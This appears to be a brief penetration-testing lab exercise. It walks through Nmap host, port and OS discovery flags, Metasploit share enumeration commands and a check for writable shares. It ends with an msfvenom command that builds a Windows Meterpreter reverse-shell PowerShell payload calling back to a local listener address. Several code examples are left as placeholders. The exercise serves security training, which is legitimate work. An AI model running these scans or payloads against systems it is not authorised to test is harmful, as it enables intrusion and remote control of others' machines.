Hands-on 1

Use Nmap to identify live machines in the local network. Enumerate open TCP ports on them and the operating system in use.

There are many interesting Nmap flags which can be used:

-sT for full connect TCP scan

-sS for half connect TCP scan

-sU for UDP scan

-sV for service detection

-O for operating system detection

-sC for default scripts to check for vulnerabilities.

// Some code

Use Metasploit to enumerate open shares on any of the live machines in the local network.

show auxiliary
show exploits
show payloads

// Some code

Check if we have write permissions on any share.

// Some code

msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1

Last updated 2 years ago